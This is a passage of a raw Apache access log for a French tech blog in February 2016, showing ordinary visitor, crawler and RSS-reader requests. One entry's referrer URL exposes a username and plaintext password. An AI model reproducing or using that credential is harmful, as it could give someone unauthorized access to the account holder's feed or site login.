-0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4483 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\"\n165.225.80.115 - - [09/Feb/2016:02:48:01 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 503 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\"\n198.58.102.96 - - [09/Feb/2016:02:50:49 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n66.249.64.132 - - [09/Feb/2016:02:56:07 -0800] \"GET /post/103124816768/paul-duan-le-super-heros-de-la-data-science-pour HTTP/1.1\" 301 368 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n66.249.93.116 - - [09/Feb/2016:02:57:48 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google Favicon\"\n217.145.35.62 - - [09/Feb/2016:02:57:51 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6229 \"http://techmeup.co/teresa-colombi-ou-le-futur-de-lexperience-utilisateur/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n217.145.35.62 - - [09/Feb/2016:02:57:51 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/teresa-colombi-ou-le-futur-de-lexperience-utilisateur/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n217.145.35.62 - - [09/Feb/2016:02:57:51 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/teresa-colombi-ou-le-futur-de-lexperience-utilisateur/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n217.145.35.62 - - [09/Feb/2016:02:57:51 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/teresa-colombi-ou-le-futur-de-lexperience-utilisateur/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n217.145.35.62 - - [09/Feb/2016:02:57:51 -0800] \"GET /wp-content/uploads/2014/06/tumblr_inline_n773jlxJpN1sa6hof-50x50.jpg HTTP/1.1\" 200 2114 \"http://techmeup.co/teresa-colombi-ou-le-futur-de-lexperience-utilisateur/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n217.145.35.62 - - [09/Feb/2016:02:57:51 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 437 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n217.145.35.62 - - [09/Feb/2016:02:57:53 -0800] \"GET /teresa-colombi-ou-le-futur-de-lexperience-utilisateur/?cf_action=sync_comments&post_id=325 HTTP/1.1\" 200 308 \"http://techmeup.co/teresa-colombi-ou-le-futur-de-lexperience-utilisateur/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n66.249.64.11 - - [09/Feb/2016:02:59:07 -0800] \"GET /robots.txt HTTP/1.1\" 200 423 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n80.13.10.184 - - [09/Feb/2016:03:02:06 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n80.13.10.184 - - [09/Feb/2016:03:02:28 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko)\"\n31.13.102.108 - - [09/Feb/2016:03:02:29 -0800] \"GET /wp-content/uploads/2014/06/tumblr_inline_n6kfddJqSP1sa6hof-50x50.jpg HTTP/1.1\" 206 2784 \"http://techmeup.co/teresa-colombi-ou-le-futur-de-lexperience-utilisateur/\" \"facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)\"\n80.13.10.184 - - [09/Feb/2016:03:02:39 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1\"\n2.1.201.36 - - [09/Feb/2016:03:06:32 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n66.249.64.138 - - [09/Feb/2016:03:14:27 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/ HTTP/1.1\" 200 15531 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n66.249.64.250 - - [09/Feb/2016:03:17:37 -0800] \"GET /paul-duan-le-super-heros-de-la-data-science-pour/ HTTP/1.1\" 200 10147 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n199.16.156.124 - - [09/Feb/2016:03:20:34 -0800] \"GET /post/82763315244/florent-crivello-ingenieur-ios-a-kwarter HTTP/1.1\" 301 304 \"-\" \"Twitterbot/1.0\"\n141.8.132.38 - - [09/Feb/2016:03:22:54 -0800] \"GET /favicon.ico HTTP/1.1\" 200 238 \"-\" \"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\"\n66.249.64.250 - - [09/Feb/2016:03:26:47 -0800] \"GET /raodath-aminou-la-revolution-du-commerce-est-en/ HTTP/1.1\" 200 9249 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n193.48.136.254 - - [09/Feb/2016:03:34:47 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la-silicon HTTP/1.1\" 404 4871 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko)\"\n193.48.136.254 - - [09/Feb/2016:03:34:49 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n193.48.136.254 - - [09/Feb/2016:03:35:06 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n66.249.64.132 - - [09/Feb/2016:03:38:56 -0800] \"GET /rostom-cheikh-aissa-de-gdf-suez-complexity-is HTTP/1.1\" 301 442 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n66.249.64.138 - - [09/Feb/2016:03:41:57 -0800] \"GET /creer-sa-startup-seul-et-la-revendre-a-un-geant/ HTTP/1.1\" 200 10059 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n199.16.156.124 - - [09/Feb/2016:03:42:10 -0800] \"GET /5-questions-a-ilan-abehassera/ HTTP/1.1\" 200 8477 \"-\" \"Twitterbot/1.0\"\n199.16.156.124 - - [09/Feb/2016:03:42:11 -0800] \"GET /post/98806539878/le-jour-ou-les-startups-tech-nauront-plus-de-sens HTTP/1.1\" 301 313 \"-\" \"Twitterbot/1.0\"\n199.16.156.125 - - [09/Feb/2016:03:42:11 -0800] \"GET /nathan-barraille-lead-developer-a-slideshare/ HTTP/1.1\" 200 10474 \"-\" \"Twitterbot/1.0\"\n199.16.156.125 - - [09/Feb/2016:03:42:12 -0800] \"GET /post/86385064806/office-tour-de-rackspace-san-francisco-avec-blake HTTP/1.1\" 301 313 \"-\" \"Twitterbot/1.0\"\n199.16.156.124 - - [09/Feb/2016:03:42:13 -0800] \"GET /post/97646423958/alexei-chemenda-toujours-etudiant-et-deja-entrepreneur HTTP/1.1\" 301 318 \"-\" \"Twitterbot/1.0\"\n199.16.156.126 - - [09/Feb/2016:03:42:15 -0800] \"GET /post/85133972498/julie-foulon-de-betagroup-fait-swinguer-la-belgique HTTP/1.1\" 301 315 \"-\" \"Twitterbot/1.0\"\n199.16.156.126 - - [09/Feb/2016:03:42:14 -0800] \"GET /le-talent-cache-dalexei-chemenda-co-fondateur-de/ HTTP/1.1\" 200 8715 \"-\" \"Twitterbot/1.0\"\n199.16.156.124 - - [09/Feb/2016:03:42:14 -0800] \"GET /sylvia-gallusser-expatriee-aux-us-jaime-mon-pays-la-france-reviensleon/ HTTP/1.1\" 200 8831 \"-\" \"Twitterbot/1.0\"\n199.16.156.126 - - [09/Feb/2016:03:42:16 -0800] \"GET /post/103488947853/textme-cest-de-la-bombe HTTP/1.1\" 301 287 \"-\" \"Twitterbot/1.0\"\n199.16.156.125 - - [09/Feb/2016:03:42:17 -0800] \"GET /julie-foulon-de-betagroup-fait-swinguer-la-belgique HTTP/1.1\" 404 4816 \"-\" \"Twitterbot/1.0\"\n199.16.156.125 - - [09/Feb/2016:03:42:16 -0800] \"GET /alexei-chemenda-toujours-etudiant-et-deja-entrepreneur HTTP/1.1\" 404 4816 \"-\" \"Twitterbot/1.0\"\n199.16.156.126 - - [09/Feb/2016:03:42:16 -0800] \"GET / HTTP/1.1\" 200 7218 \"-\" \"Twitterbot/1.0\"\n199.16.156.125 - - [09/Feb/2016:03:42:18 -0800] \"GET /william-brendel-research-scientist-chez-amazon-le/ HTTP/1.1\" 200 9659 \"-\" \"Twitterbot/1.0\"\n199.16.156.126 - - [09/Feb/2016:03:42:22 -0800] \"GET /wp-content/uploads/2014/06/tumblr_inline_n773jlxJpN1sa6hof-300x298.jpg HTTP/1.1\" 200 20477 \"-\" \"Twitterbot/1.0\"\n199.16.156.126 - - [09/Feb/2016:03:42:19 -0800] \"GET /techmeup-le-monde-merveilleux-de-la-tech HTTP/1.1\" 301 381 \"-\" \"Twitterbot/1.0\"\n199.16.156.124 - - [09/Feb/2016:03:42:23 -0800] \"GET /wp-content/uploads/2014/09/tumblr_inline_nbn26ulwUH1sygmpd-200x300.jpg HTTP/1.1\" 200 22021 \"-\" \"Twitterbot/1.0\"\n199.16.156.125 - - [09/Feb/2016:03:42:21 -0800] \"GET /paul-duan-le-super-heros-de-la-data-science-pour/ HTTP/1.1\" 200 10070 \"-\" \"Twitterbot/1.0\"\n199.16.156.125 - - [09/Feb/2016:03:42:29 -0800] \"GET /textme-cest-de-la-bombe HTTP/1.1\" 301 364 \"-\" \"Twitterbot/1.0\"\n209.133.111.211 - - [09/Feb/2016:03:43:18 -0800] \"GET /feed/ HTTP/1.1\" 200 20931 \"-\" \"rogerbot/1.0 (http://www.moz.com/dp/rogerbot, rogerbot-crawler@moz.com)\"\n198.58.103.160 - - [09/Feb/2016:03:48:11 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n199.16.156.125 - - [09/Feb/2016:03:54:06 -0800] \"GET /post/95372240798/pierre-olivier-pod-dybman-le-tech-francais-de HTTP/1.1\" 301 309 \"-\" \"Twitterbot/1.0\"\n180.76.15.31 - - [09/Feb/2016:03:55:08 -0800] \"GET /category/how-to/ HTTP/1.1\" 200 6045 \"-\" \"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)\"\n178.255.215.65 - - [09/Feb/2016:03:57:50 -0800] \"GET /frenchweb-de-lautre-cote-de-la-camera/ HTTP/1.1\" 200 8038 \"-\" \"Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)\"\n82.225.121.227 - - [09/Feb/2016:04:00:36 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6229 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/45.0.2454.89 Mobile/12B435 Safari/600.1.4\"\n82.225.121.227 - - [09/Feb/2016:04:00:36 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/45.0.2454.89 Mobile/12B435 Safari/600.1.4\"\n82.225.121.227 - - [09/Feb/2016:04:00:36 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/45.0.2454.89 Mobile/12B435 Safari/600.1.4\"\n82.225.121.227 - - [09/Feb/2016:04:00:37 -0800] \"GET /wp-content/uploads/2014/11/tumblr_inline_negm7m1xwx1sygmpd-50x50.jpg HTTP/1.1\" 200 1740 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/45.0.2454.89 Mobile/12B435 Safari/600.1.4\"\n82.225.121.227 - - [09/Feb/2016:04:00:37 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/disqus.js?ver=4.1.1 HTTP/1.1\" 200 1101 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/45.0.2454.89 Mobile/12B435 Safari/600.1.4\"\n82.225.121.227 - - [09/Feb/2016:04:00:39 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/45.0.2454.89 Mobile/12B435 Safari/600.1.4\"\n82.225.121.227 - - [09/Feb/2016:04:00:48 -0800] \"GET /wordpress/wp-content/uploads/2015/02/favico.png HTTP/1.1\" 200 987 \"-\" \"Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/45.0.2454.89 Mobile/12B435 Safari/600.1.4\"\n198.58.102.49 - - [09/Feb/2016:04:04:11 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n199.59.148.209 - - [09/Feb/2016:04:06:22 -0800] \"GET /robots.txt HTTP/1.1\" 200 367 \"-\" \"Twitterbot/1.0\"\n2.1.201.36 - - [09/Feb/2016:04:06:38 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n198.58.102.158 - - [09/Feb/2016:04:12:19 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n62.210.162.19 - - [09/Feb/2016:04:14:23 -0800] \"GET /wp-content/uploads/2015/03/1-9mRgHn-sBX_FQuA08m4kdA-1024x755.jpeg HTTP/1.1\" 200 97501 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3\"\n62.210.141.46 - - [09/Feb/2016:04:18:06 -0800] \"GET /wp-content/uploads/2015/02/10527525_10153205547817652_3810498128776234928_n-300x300.jpg HTTP/1.1\" 200 34314 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3\"\n62.210.141.46 - - [09/Feb/2016:04:18:06 -0800] \"GET /wp-content/uploads/2015/03/1-l57K-8uyN9ELuGbgcaItmw-1024x524.png HTTP/1.1\" 200 190496 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3\"\n62.210.141.47 - - [09/Feb/2016:04:22:13 -0800] \"GET /wp-content/uploads/2015/02/10527525_10153205547817652_3810498128776234928_n-300x300.jpg HTTP/1.1\" 200 34314 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3\"\n62.210.141.47 - - [09/Feb/2016:04:22:13 -0800] \"GET /wp-content/uploads/2015/03/1-4hdrSSvSgHd6oa4AL5KK3Q.jpeg HTTP/1.1\" 200 174731 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3\"\n173.244.168.194 - - [09/Feb/2016:04:23:41 -0800] \"GET /wp-content/uploads/2015/03/4N8A4857-1024x683.jpg HTTP/1.1\" 200 115506 \"-\" \"Java/1.7.0_10\"\n173.244.168.226 - - [09/Feb/2016:04:23:41 -0800] \"GET /wp-content/uploads/2015/03/1-4hdrSSvSgHd6oa4AL5KK3Q.jpeg HTTP/1.1\" 200 174731 \"-\" \"Java/1.7.0_10\"\n80.13.10.184 - - [09/Feb/2016:04:26:00 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n80.13.10.184 - - [09/Feb/2016:04:26:11 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n80.13.10.184 - - [09/Feb/2016:04:26:32 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1\"\n198.58.103.28 - - [09/Feb/2016:04:38:02 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n92.139.71.249 - - [09/Feb/2016:04:39:12 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/ HTTP/1.1\" 200 15513 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko)\"\n92.139.71.249 - - [09/Feb/2016:04:39:24 -0800] \"GET /post/98008044383/trouver-un-job-tech-a-san-francisco-ou-dans-la HTTP/1.1\" 301 366 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1\"\n92.139.71.249 - - [09/Feb/2016:04:39:26 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n198.58.102.95 - - [09/Feb/2016:04:46:43 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n193.164.197.233 - - [09/Feb/2016:04:52:59 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n193.164.197.233 - - [09/Feb/2016:04:53:10 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n90.216.150.194 - - [09/Feb/2016:05:01:12 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 505 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Linux; Android 6.0; LG-H815 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36\"\n90.216.150.194 - - [09/Feb/2016:05:01:12 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Linux; Android 6.0; LG-H815 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36\"\n90.216.150.194 - - [09/Feb/2016:05:01:12 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Linux; Android 6.0; LG-H815 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36\"\n90.216.150.194 - - [09/Feb/2016:05:01:14 -0800] \"GET /wp-content/plugins/wp-shortcode/js/wp-shortcode.js?ver=4.1.1 HTTP/1.1\" 200 832 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Linux; Android 6.0; LG-H815 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36\"\n90.216.150.194 - - [09/Feb/2016:05:01:14 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Linux; Android 6.0; LG-H815 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36\"\n90.216.150.194 - - [09/Feb/2016:05:01:14 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 437 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Linux; Android 6.0; LG-H815 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36\"\n90.216.150.194 - - [09/Feb/2016:05:01:23 -0800] \"GET /wordpress/wp-content/uploads/2015/02/favico.png HTTP/1.1\" 200 987 \"-\" \"Mozilla/5.0 (Linux; Android 6.0; LG-H815 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36\"\n62.210.142.23 - jez [09/Feb/2016:05:06:06 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://jez:lumn0h3D@techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n198.58.96.215 - - [09/Feb/2016:05:13:58 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n79.93.156.12 - - [09/Feb/2016:05:19:32 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6228 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 6.1; rv:44.0) Gecko/20100101 Firefox/44.0\"\n79.93.156.12 - - [09/Feb/2016:05:19:32 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 6.1; rv:44.0) Gecko/20100101 Firefox/44.0\"\n79.93.156.12 - - [09/Feb/2016:05:19:32 -0800] \"GET /wp-content/plugins/wp-shortcode/js/jquery.tipsy.js?ver=4.1.1 HTTP/1.1\" 200 3065 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 6.1; rv:44.0) Gecko/20100101 Firefox/44.0\"\n79.93.156.12 - - [09/Feb/2016:05:19:32 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 6.1; rv:44.0) Gecko/20100101 Firefox/44.0\"\n79.93.156.12 - - [09/Feb/2016:05:19:32 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1; rv:44.0) Gecko/20100101 Firefox/44.0\"\n31.130.135.67 - - [09/Feb/2016:05:23:13 -0800] \"GET /favicon.ico HTTP/1.1\" 200 239 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) YaBrowser/16.2.0.3537.10 Mobile/11D257 Safari/9537.53\"\n62.210.188.62 - - [09/Feb/2016:05:25:50 -0800] \"GET /wp-content/uploads/2015/02/10527525_10153205547817652_3810498128776234928_n-300x300.jpg HTTP/1.1\" 200 34314 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3\"\n62.210.188.62 - - [09/Feb/2016:05:25:50 -0800] \"GET /wp-content/uploads/2015/03/1-l57K-8uyN9ELuGbgcaItmw-1024x524.png HTTP/1.1\" 200 190496 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3\"\n178.137.17.196 - - [09/Feb/2016:05:26:09 -0800] \"GET /steeve-morin-de-google-a-lentreprenariat/ HTTP/1.1\" 200 29399 \"http://smstraf.ru/\" \"Opera/9.0 (Windows NT 5.1; U; en)\"\n209.51.205.2 - - [09/Feb/2016:05:27:18 -0800] \"GET /wp-content/uploads/2015/03/1-4hdrSSvSgHd6oa4AL5KK3Q.jpeg HTTP/1.1\" 200 174731 \"-\" \"Java/1.7.0_10\"\n5.39.17.245 - - [09/Feb/2016:05:29:22 -0800] \"GET /feed/ HTTP/1.1\" 200 20931 \"http://techmeup.co/feed/\" \"SimplePie/1.3.1 (Feed Parser; http://simplepie.org; Allow like Gecko) Build/20140612090914\"\n80.13.10.184 - - [09/Feb/2016:05:31:08 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n80.13.10.184 - - [09/Feb/2016:05:31:20 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n80.13.10.184 - - [09/Feb/2016:05:31:40 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n66.249.64.149 - - [09/Feb/2016:05:35:27 -0800] \"GET /robots.txt HTTP/1.1\" 200 423 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n2.1.201.36 - - [09/Feb/2016:05:36:16 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) 